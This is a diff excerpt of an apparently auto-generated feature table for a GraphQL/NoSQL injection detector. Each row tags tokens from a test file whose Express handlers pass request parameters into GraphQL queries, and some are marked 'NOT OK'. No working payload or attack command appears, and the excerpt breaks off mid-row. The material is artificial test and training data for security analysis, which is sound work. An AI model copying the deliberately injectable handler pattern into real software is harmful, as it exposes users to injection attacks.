autogenerated/NosqlAndSqlInjection/untyped/graphql.js:108:7:110:7 | variabl ... } | contextFunctionInterfaces | hello() | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:108:7:110:7 | variabl ... } | contextFunctionInterfaces | hello() | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:108:7:110:7 | variabl ... } | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:108:7:110:7 | variabl ... } | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:108:7:110:7 | variabl ... } | enclosingFunctionBody | req res id req query id result nativeGraphql schema { foo id } root fetch https://my-grpahql-server.com/graphql method POST headers Content-Type application/json body JSON stringify query {\n thing {\n name\n url\n id \n }\n } fetch https://my-grpahql-server.com/graphql method POST headers Content-Type application/json body JSON stringify query {\n thing {\n name\n url\n $id\n }\n } variables id id | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:108:7:110:7 | variabl ... } | enclosingFunctionBody | req res id req query id result nativeGraphql schema { foo id } root fetch https://my-grpahql-server.com/graphql method POST headers Content-Type application/json body JSON stringify query {\n thing {\n name\n url\n id \n }\n } fetch https://my-grpahql-server.com/graphql method POST headers Content-Type application/json body JSON stringify query {\n thing {\n name\n url\n $id\n }\n } variables id id | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:108:7:110:7 | variabl ... } | enclosingFunctionName | app.get#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:108:7:110:7 | variabl ... } | enclosingFunctionName | app.get#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:108:7:110:7 | variabl ... } | fileImports | @actions/github @octokit/core @octokit/graphql @octokit/request @octokit/rest express graphql | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:108:7:110:7 | variabl ... } | fileImports | @actions/github @octokit/core @octokit/graphql @octokit/request @octokit/rest express graphql | | autogenerated/NosqlAndSqlInjection/untyped/graphql.js:108:18:110:7 | {\\n ... } | CalleeFlexibleAccessPath | JSON.stringify | | autogenerated/NosqlAndSqlInjection/untyped/graphql.js:108:18:110:7 | {\\n ... } | InputAccessPathFromCallee | 0.variables | | autogenerated/NosqlAndSqlInjection/untyped/graphql.js:108:18:110:7 | {\\n ... } | InputArgumentIndex | 0 | @@ -579,6 +3116,21 @@ tokenFeatures | autogenerated/NosqlAndSqlInjection/untyped/graphql.js:108:18:110:7 | {\\n ... } | enclosingFunctionBody | req res id req query id result nativeGraphql schema { foo id } root fetch https://my-grpahql-server.com/graphql method POST headers Content-Type application/json body JSON stringify query {\n thing {\n name\n url\n id \n }\n } fetch https://my-grpahql-server.com/graphql method POST headers Content-Type application/json body JSON stringify query {\n thing {\n name\n url\n $id\n }\n } variables id id | | autogenerated/NosqlAndSqlInjection/untyped/graphql.js:108:18:110:7 | {\\n ... } | enclosingFunctionName | app.get#functionalargument | | autogenerated/NosqlAndSqlInjection/untyped/graphql.js:108:18:110:7 | {\\n ... } | fileImports | @actions/github @octokit/core @octokit/graphql @octokit/request @octokit/rest express graphql | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:109:9:109:10 | id | contextFunctionInterfaces | hello() | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:109:9:109:10 | id | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:109:9:109:10 | id | enclosingFunctionBody | req res id req query id result nativeGraphql schema { foo id } root fetch https://my-grpahql-server.com/graphql method POST headers Content-Type application/json body JSON stringify query {\n thing {\n name\n url\n id \n }\n } fetch https://my-grpahql-server.com/graphql method POST headers Content-Type application/json body JSON stringify query {\n thing {\n name\n url\n $id\n }\n } variables id id | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:109:9:109:10 | id | enclosingFunctionName | app.get#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:109:9:109:10 | id | fileImports | @actions/github @octokit/core @octokit/graphql @octokit/request @octokit/rest express graphql | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:109:9:109:14 | id: id | contextFunctionInterfaces | hello() | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:109:9:109:14 | id: id | contextFunctionInterfaces | hello() | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:109:9:109:14 | id: id | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:109:9:109:14 | id: id | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:109:9:109:14 | id: id | enclosingFunctionBody | req res id req query id result nativeGraphql schema { foo id } root fetch https://my-grpahql-server.com/graphql method POST headers Content-Type application/json body JSON stringify query {\n thing {\n name\n url\n id \n }\n } fetch https://my-grpahql-server.com/graphql method POST headers Content-Type application/json body JSON stringify query {\n thing {\n name\n url\n $id\n }\n } variables id id | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:109:9:109:14 | id: id | enclosingFunctionBody | req res id req query id result nativeGraphql schema { foo id } root fetch https://my-grpahql-server.com/graphql method POST headers Content-Type application/json body JSON stringify query {\n thing {\n name\n url\n id \n }\n } fetch https://my-grpahql-server.com/graphql method POST headers Content-Type application/json body JSON stringify query {\n thing {\n name\n url\n $id\n }\n } variables id id | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:109:9:109:14 | id: id | enclosingFunctionName | app.get#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:109:9:109:14 | id: id | enclosingFunctionName | app.get#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:109:9:109:14 | id: id | fileImports | @actions/github @octokit/core @octokit/graphql @octokit/request @octokit/rest express graphql | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:109:9:109:14 | id: id | fileImports | @actions/github @octokit/core @octokit/graphql @octokit/request @octokit/rest express graphql | | autogenerated/NosqlAndSqlInjection/untyped/graphql.js:109:13:109:14 | id | CalleeFlexibleAccessPath | JSON.stringify | | autogenerated/NosqlAndSqlInjection/untyped/graphql.js:109:13:109:14 | id | InputAccessPathFromCallee | 0.variables.id | | autogenerated/NosqlAndSqlInjection/untyped/graphql.js:109:13:109:14 | id | InputArgumentIndex | 0 | @@ -588,12 +3140,46 @@ tokenFeatures | autogenerated/NosqlAndSqlInjection/untyped/graphql.js:109:13:109:14 | id | enclosingFunctionBody | req res id req query id result nativeGraphql schema { foo id } root fetch https://my-grpahql-server.com/graphql method POST headers Content-Type application/json body JSON stringify query {\n thing {\n name\n url\n id \n }\n } fetch https://my-grpahql-server.com/graphql method POST headers Content-Type application/json body JSON stringify query {\n thing {\n name\n url\n $id\n }\n } variables id id | | autogenerated/NosqlAndSqlInjection/untyped/graphql.js:109:13:109:14 | id | enclosingFunctionName | app.get#functionalargument | | autogenerated/NosqlAndSqlInjection/untyped/graphql.js:109:13:109:14 | id | fileImports | @actions/github @octokit/core @octokit/graphql @octokit/request @octokit/rest express graphql | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:115:7:115:12 | github | contextFunctionInterfaces | hello() | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:115:7:115:12 | github | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:115:7:115:12 | github | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:115:7:115:12 | github | fileImports | @actions/github @octokit/core @octokit/graphql @octokit/request @octokit/rest express graphql | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:115:7:115:41 | github | contextFunctionInterfaces | hello() | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:115:7:115:41 | github | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:115:7:115:41 | github | fileImports | @actions/github @octokit/core @octokit/graphql @octokit/request @octokit/rest express graphql | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:115:7:115:41 | github ... ithub') | contextFunctionInterfaces | hello() | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:115:7:115:41 | github ... ithub') | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:115:7:115:41 | github ... ithub') | fileImports | @actions/github @octokit/core @octokit/graphql @octokit/request @octokit/rest express graphql | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:115:16:115:22 | require | contextFunctionInterfaces | hello() | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:115:16:115:22 | require | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:115:16:115:22 | require | fileImports | @actions/github @octokit/core @octokit/graphql @octokit/request @octokit/rest express graphql | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:115:16:115:41 | exceptional return of require ... ithub') | contextFunctionInterfaces | hello() | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:115:16:115:41 | exceptional return of require ... ithub') | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:115:16:115:41 | exceptional return of require ... ithub') | fileImports | @actions/github @octokit/core @octokit/graphql @octokit/request @octokit/rest express graphql | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:115:16:115:41 | require ... ithub') | contextFunctionInterfaces | hello() | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:115:16:115:41 | require ... ithub') | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:115:16:115:41 | require ... ithub') | fileImports | @actions/github @octokit/core @octokit/graphql @octokit/request @octokit/rest express graphql | | autogenerated/NosqlAndSqlInjection/untyped/graphql.js:115:24:115:40 | '@actions/github' | CalleeFlexibleAccessPath | require | | autogenerated/NosqlAndSqlInjection/untyped/graphql.js:115:24:115:40 | '@actions/github' | InputArgumentIndex | 0 | | autogenerated/NosqlAndSqlInjection/untyped/graphql.js:115:24:115:40 | '@actions/github' | calleeImports | | | autogenerated/NosqlAndSqlInjection/untyped/graphql.js:115:24:115:40 | '@actions/github' | contextFunctionInterfaces | hello() | | autogenerated/NosqlAndSqlInjection/untyped/graphql.js:115:24:115:40 | '@actions/github' | contextSurroundingFunctionParameters | | | autogenerated/NosqlAndSqlInjection/untyped/graphql.js:115:24:115:40 | '@actions/github' | fileImports | @actions/github @octokit/core @octokit/graphql @octokit/request @octokit/rest express graphql | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:116:1:116:3 | app | contextFunctionInterfaces | hello() | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:116:1:116:3 | app | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:116:1:116:3 | app | fileImports | @actions/github @octokit/core @octokit/graphql @octokit/request @octokit/rest express graphql | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:116:1:116:7 | app.get | contextFunctionInterfaces | hello() | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:116:1:116:7 | app.get | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:116:1:116:7 | app.get | fileImports | @actions/github @octokit/core @octokit/graphql @octokit/request @octokit/rest express graphql | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:116:1:121:2 | app.get ... T OK\\n}) | contextFunctionInterfaces | hello() | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:116:1:121:2 | app.get ... T OK\\n}) | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:116:1:121:2 | app.get ... T OK\\n}) | fileImports | @actions/github @octokit/core @octokit/graphql @octokit/request @octokit/rest express graphql | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:116:1:121:2 | exceptional return of app.get ... T OK\\n}) | contextFunctionInterfaces | hello() | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:116:1:121:2 | exceptional return of app.get ... T OK\\n}) | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:116:1:121:2 | exceptional return of app.get ... T OK\\n}) | fileImports | @actions/github @octokit/core @octokit/graphql @octokit/request @octokit/rest express graphql | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:116:5:116:7 | get | contextFunctionInterfaces | hello() | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:116:5:116:7 | get | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:116:5:116:7 | get | fileImports | @actions/github @octokit/core @octokit/graphql @octokit/request @octokit/rest express graphql | | autogenerated/NosqlAndSqlInjection/untyped/graphql.js:116:9:116:21 | '/event/:id/' | CalleeFlexibleAccessPath | app.get | | autogenerated/NosqlAndSqlInjection/untyped/graphql.js:116:9:116:21 | '/event/:id/' | InputArgumentIndex | 0 | | autogenerated/NosqlAndSqlInjection/untyped/graphql.js:116:9:116:21 | '/event/:id/' | calleeImports | express | @@ -601,6 +3187,21 @@ tokenFeatures | autogenerated/NosqlAndSqlInjection/untyped/graphql.js:116:9:116:21 | '/event/:id/' | contextSurroundingFunctionParameters | | | autogenerated/NosqlAndSqlInjection/untyped/graphql.js:116:9:116:21 | '/event/:id/' | fileImports | @actions/github @octokit/core @octokit/graphql @octokit/request @octokit/rest express graphql | | autogenerated/NosqlAndSqlInjection/untyped/graphql.js:116:9:116:21 | '/event/:id/' | receiverName | app | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:116:24:116:23 | github | contextFunctionInterfaces | hello() | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:116:24:116:23 | github | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:116:24:116:23 | github | enclosingFunctionBody | req res kit github getOctokit foo id req params id result kit graphql foo id | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:116:24:116:23 | github | enclosingFunctionName | app.get#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:116:24:116:23 | github | fileImports | @actions/github @octokit/core @octokit/graphql @octokit/request @octokit/rest express graphql | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:116:24:116:23 | this | contextFunctionInterfaces | hello() | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:116:24:116:23 | this | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:116:24:116:23 | this | enclosingFunctionBody | req res kit github getOctokit foo id req params id result kit graphql foo id | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:116:24:116:23 | this | enclosingFunctionName | app.get#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:116:24:116:23 | this | fileImports | @actions/github @octokit/core @octokit/graphql @octokit/request @octokit/rest express graphql | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:116:24:121:1 | 'arguments' object of anonymous function | contextFunctionInterfaces | hello() | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:116:24:121:1 | 'arguments' object of anonymous function | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:116:24:121:1 | 'arguments' object of anonymous function | enclosingFunctionBody | req res kit github getOctokit foo id req params id result kit graphql foo id | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:116:24:121:1 | 'arguments' object of anonymous function | enclosingFunctionName | app.get#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:116:24:121:1 | 'arguments' object of anonymous function | fileImports | @actions/github @octokit/core @octokit/graphql @octokit/request @octokit/rest express graphql | | autogenerated/NosqlAndSqlInjection/untyped/graphql.js:116:24:121:1 | async f ... OT OK\\n} | CalleeFlexibleAccessPath | app.get | | autogenerated/NosqlAndSqlInjection/untyped/graphql.js:116:24:121:1 | async f ... OT OK\\n} | InputArgumentIndex | 1 | | autogenerated/NosqlAndSqlInjection/untyped/graphql.js:116:24:121:1 | async f ... OT OK\\n} | calleeImports | express | @@ -608,6 +3209,71 @@ tokenFeatures | autogenerated/NosqlAndSqlInjection/untyped/graphql.js:116:24:121:1 | async f ... OT OK\\n} | contextSurroundingFunctionParameters | (req, res) | | autogenerated/NosqlAndSqlInjection/untyped/graphql.js:116:24:121:1 | async f ... OT OK\\n} | fileImports | @actions/github @octokit/core @octokit/graphql @octokit/request @octokit/rest express graphql | | autogenerated/NosqlAndSqlInjection/untyped/graphql.js:116:24:121:1 | async f ... OT OK\\n} | receiverName | app | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:116:24:121:1 | exceptional return of anonymous function | contextFunctionInterfaces | hello() | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:116:24:121:1 | exceptional return of anonymous function | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:116:24:121:1 | exceptional return of anonymous function | enclosingFunctionBody | req res kit github getOctokit foo id req params id result kit graphql foo id | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:116:24:121:1 | exceptional return of anonymous function | enclosingFunctionName | app.get#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:116:24:121:1 | exceptional return of anonymous function | fileImports | @actions/github @octokit/core @octokit/graphql @octokit/request @octokit/rest express graphql | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:116:24:121:1 | return of anonymous function | contextFunctionInterfaces | hello() | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:116:24:121:1 | return of anonymous function | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:116:24:121:1 | return of anonymous function | enclosingFunctionBody | req res kit github getOctokit foo id req params id result kit graphql foo id | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:116:24:121:1 | return of anonymous function | enclosingFunctionName | app.get#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:116:24:121:1 | return of anonymous function | fileImports | @actions/github @octokit/core @octokit/graphql @octokit/request @octokit/rest express graphql | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:116:39:116:41 | req | contextFunctionInterfaces | hello() | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:116:39:116:41 | req | contextFunctionInterfaces | hello() | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:116:39:116:41 | req | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:116:39:116:41 | req | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:116:39:116:41 | req | enclosingFunctionBody | req res kit github getOctokit foo id req params id result kit graphql foo id | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:116:39:116:41 | req | enclosingFunctionBody | req res kit github getOctokit foo id req params id result kit graphql foo id | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:116:39:116:41 | req | enclosingFunctionName | app.get#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:116:39:116:41 | req | enclosingFunctionName | app.get#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:116:39:116:41 | req | fileImports | @actions/github @octokit/core @octokit/graphql @octokit/request @octokit/rest express graphql | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:116:39:116:41 | req | fileImports | @actions/github @octokit/core @octokit/graphql @octokit/request @octokit/rest express graphql | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:116:44:116:46 | res | contextFunctionInterfaces | hello() | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:116:44:116:46 | res | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:116:44:116:46 | res | enclosingFunctionBody | req res kit github getOctokit foo id req params id result kit graphql foo id | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:116:44:116:46 | res | enclosingFunctionName | app.get#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:116:44:116:46 | res | fileImports | @actions/github @octokit/core @octokit/graphql @octokit/request @octokit/rest express graphql | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:117:11:117:13 | kit | contextFunctionInterfaces | hello() | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:117:11:117:13 | kit | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:117:11:117:13 | kit | enclosingFunctionBody | req res kit github getOctokit foo id req params id result kit graphql foo id | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:117:11:117:13 | kit | enclosingFunctionName | app.get#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:117:11:117:13 | kit | fileImports | @actions/github @octokit/core @octokit/graphql @octokit/request @octokit/rest express graphql | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:117:11:117:40 | kit | contextFunctionInterfaces | hello() | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:117:11:117:40 | kit | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:117:11:117:40 | kit | enclosingFunctionBody | req res kit github getOctokit foo id req params id result kit graphql foo id | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:117:11:117:40 | kit | enclosingFunctionName | app.get#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:117:11:117:40 | kit | fileImports | @actions/github @octokit/core @octokit/graphql @octokit/request @octokit/rest express graphql | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:117:11:117:40 | kit = g ... ("foo") | contextFunctionInterfaces | hello() | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:117:11:117:40 | kit = g ... ("foo") | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:117:11:117:40 | kit = g ... ("foo") | enclosingFunctionBody | req res kit github getOctokit foo id req params id result kit graphql foo id | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:117:11:117:40 | kit = g ... ("foo") | enclosingFunctionName | app.get#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:117:11:117:40 | kit = g ... ("foo") | fileImports | @actions/github @octokit/core @octokit/graphql @octokit/request @octokit/rest express graphql | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:117:17:117:22 | github | contextFunctionInterfaces | hello() | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:117:17:117:22 | github | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:117:17:117:22 | github | enclosingFunctionBody | req res kit github getOctokit foo id req params id result kit graphql foo id | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:117:17:117:22 | github | enclosingFunctionName | app.get#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:117:17:117:22 | github | fileImports | @actions/github @octokit/core @octokit/graphql @octokit/request @octokit/rest express graphql | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:117:17:117:33 | github.getOctokit | contextFunctionInterfaces | hello() | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:117:17:117:33 | github.getOctokit | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:117:17:117:33 | github.getOctokit | enclosingFunctionBody | req res kit github getOctokit foo id req params id result kit graphql foo id | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:117:17:117:33 | github.getOctokit | enclosingFunctionName | app.get#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:117:17:117:33 | github.getOctokit | fileImports | @actions/github @octokit/core @octokit/graphql @octokit/request @octokit/rest express graphql | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:117:17:117:40 | exceptional return of github. ... ("foo") | contextFunctionInterfaces | hello() | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:117:17:117:40 | exceptional return of github. ... ("foo") | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:117:17:117:40 | exceptional return of github. ... ("foo") | enclosingFunctionBody | req res kit github getOctokit foo id req params id result kit graphql foo id | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:117:17:117:40 | exceptional return of github. ... ("foo") | enclosingFunctionName | app.get#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:117:17:117:40 | exceptional return of github. ... ("foo") | fileImports | @actions/github @octokit/core @octokit/graphql @octokit/request @octokit/rest express graphql | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:117:17:117:40 | github. ... ("foo") | contextFunctionInterfaces | hello() | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:117:17:117:40 | github. ... ("foo") | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:117:17:117:40 | github. ... ("foo") | enclosingFunctionBody | req res kit github getOctokit foo id req params id result kit graphql foo id | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:117:17:117:40 | github. ... ("foo") | enclosingFunctionName | app.get#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:117:17:117:40 | github. ... ("foo") | fileImports | @actions/github @octokit/core @octokit/graphql @octokit/request @octokit/rest express graphql | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:117:24:117:33 | getOctokit | contextFunctionInterfaces | hello() | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:117:24:117:33 | getOctokit | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:117:24:117:33 | getOctokit | enclosingFunctionBody | req res kit github getOctokit foo id req params id result kit graphql foo id | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:117:24:117:33 | getOctokit | enclosingFunctionName | app.get#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:117:24:117:33 | getOctokit | fileImports | @actions/github @octokit/core @octokit/graphql @octokit/request @octokit/rest express graphql | | autogenerated/NosqlAndSqlInjection/untyped/graphql.js:117:35:117:39 | "foo" | CalleeFlexibleAccessPath | github.getOctokit | | autogenerated/NosqlAndSqlInjection/untyped/graphql.js:117:35:117:39 | "foo" | InputArgumentIndex | 0 | | autogenerated/NosqlAndSqlInjection/untyped/graphql.js:117:35:117:39 | "foo" | calleeImports | @actions/github | @@ -617,6 +3283,86 @@ tokenFeatures | autogenerated/NosqlAndSqlInjection/untyped/graphql.js:117:35:117:39 | "foo" | enclosingFunctionName | app.get#functionalargument | | autogenerated/NosqlAndSqlInjection/untyped/graphql.js:117:35:117:39 | "foo" | fileImports | @actions/github @octokit/core @octokit/graphql @octokit/request @octokit/rest express graphql | | autogenerated/NosqlAndSqlInjection/untyped/graphql.js:117:35:117:39 | "foo" | receiverName | github | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:119:11:119:12 | id | contextFunctionInterfaces | hello() | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:119:11:119:12 | id | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:119:11:119:12 | id | enclosingFunctionBody | req res kit github getOctokit foo id req params id result kit graphql foo id | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:119:11:119:12 | id | enclosingFunctionName | app.get#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:119:11:119:12 | id | fileImports | @actions/github @octokit/core @octokit/graphql @octokit/request @octokit/rest express graphql | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:119:11:119:28 | id | contextFunctionInterfaces | hello() | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:119:11:119:28 | id | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:119:11:119:28 | id | enclosingFunctionBody | req res kit github getOctokit foo id req params id result kit graphql foo id | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:119:11:119:28 | id | enclosingFunctionName | app.get#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:119:11:119:28 | id | fileImports | @actions/github @octokit/core @octokit/graphql @octokit/request @octokit/rest express graphql | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:119:11:119:28 | id = req.params.id | contextFunctionInterfaces | hello() | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:119:11:119:28 | id = req.params.id | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:119:11:119:28 | id = req.params.id | enclosingFunctionBody | req res kit github getOctokit foo id req params id result kit graphql foo id | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:119:11:119:28 | id = req.params.id | enclosingFunctionName | app.get#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:119:11:119:28 | id = req.params.id | fileImports | @actions/github @octokit/core @octokit/graphql @octokit/request @octokit/rest express graphql | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:119:16:119:18 | req | contextFunctionInterfaces | hello() | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:119:16:119:18 | req | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:119:16:119:18 | req | enclosingFunctionBody | req res kit github getOctokit foo id req params id result kit graphql foo id | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:119:16:119:18 | req | enclosingFunctionName | app.get#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:119:16:119:18 | req | fileImports | @actions/github @octokit/core @octokit/graphql @octokit/request @octokit/rest express graphql | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:119:16:119:25 | req.params | contextFunctionInterfaces | hello() | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:119:16:119:25 | req.params | 